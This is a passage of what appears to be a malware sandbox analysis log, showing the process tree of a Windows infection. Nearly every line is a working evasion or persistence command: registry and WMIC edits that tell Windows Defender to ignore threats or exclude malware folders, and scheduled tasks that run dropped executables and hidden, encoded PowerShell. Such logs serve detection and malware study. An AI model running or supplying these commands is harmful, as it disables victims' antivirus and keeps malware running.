      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:10068
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:10172
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:10160
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:9300
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:9168
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:9828
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:5520
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:9988
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:6812
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:6656
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:5868
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:6708
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:2016
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
      4⤵
      Executes dropped EXE
      PID:8112
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:10052
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:7040
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:5224
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:7140
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DOWaNXZtDJLiC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DOWaNXZtDJLiC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EHjpVGHxoTMU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EHjpVGHxoTMU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RQzLvVUNU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RQzLvVUNU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEsFaEtipdnTXqXtwBR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEsFaEtipdnTXqXtwBR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nVgZiWyyyxUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nVgZiWyyyxUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\NKsRZGTfNWtvCUVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\NKsRZGTfNWtvCUVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\mlmrxyCihFugMjhe\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\mlmrxyCihFugMjhe\" /t REG_DWORD /d 0 /reg:64;"
    3⤵
    PID:6812
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DOWaNXZtDJLiC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:5520
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DOWaNXZtDJLiC" /t REG_DWORD /d 0 /reg:32
        5⤵
        
        PID:8588
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DOWaNXZtDJLiC" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:4836
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EHjpVGHxoTMU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:8364
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EHjpVGHxoTMU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:4332
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RQzLvVUNU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:4552
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RQzLvVUNU" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:9336
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEsFaEtipdnTXqXtwBR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:4656
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEsFaEtipdnTXqXtwBR" /t REG_DWORD /d 0 /reg:64
      4⤵
      Drops file in Windows directory
      PID:7264
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVgZiWyyyxUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:7836
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVgZiWyyyxUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1316
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\NKsRZGTfNWtvCUVB /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:6676
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\NKsRZGTfNWtvCUVB /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:9356
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:7840
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:4452
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\mlmrxyCihFugMjhe /t REG_DWORD /d 0 /reg:32
      4⤵
      Checks SCSI registry key(s)
      Suspicious behavior: MapViewOfSection
      PID:7176
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\mlmrxyCihFugMjhe /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:8540
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gkYTFFwaw" /SC once /ST 05:21:12 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:8592
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gkYTFFwaw"
    3⤵
    PID:8612
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gkYTFFwaw"
    3⤵
    PID:7836
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "YqJChhYnTMHzkMjCc" /SC once /ST 13:27:52 /RU "SYSTEM" /TR "\"C:\Windows\Temp\mlmrxyCihFugMjhe\GODdmYHTnpCwNhO\QUcFAJV.exe\" lA /site_id 394347 /S" /V1 /F
    3⤵
    - Creates scheduled task(s)
    PID:9220
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "YqJChhYnTMHzkMjCc"
    3⤵
    PID:4672
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  PID:8820
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:5548
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  PID:5520
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:5696
- C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\kIvrhCZ.exe
  C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\kIvrhCZ.exe uG /site_id 668658 /S
  2⤵
  - Modifies data under HKEY_USERS
  PID:7968
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
    3⤵
    PID:9560
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
      4⤵
      PID:5532
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:8084
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:6164
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        7⤵
        
        PID:7900
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
      4⤵
      PID:4904
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:1232
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:4480
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        7⤵
        Blocklisted process makes network request
        Loads dropped DLL
        
        PID:7056
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
      4⤵
      PID:9940
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:9140
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:7228
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        7⤵
        
        PID:1312
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
      4⤵
      PID:9692
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:9784
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:6816
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        7⤵
        
        PID:8988
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
    3⤵
    PID:9592
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:7068
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
        5⤵
        
        PID:8940
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:9588
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:7904
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:5624
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
      4⤵
      Drops file in Windows directory
      PID:9220
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:9452
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:8012
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:5832
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:7840
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:7392
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:9132
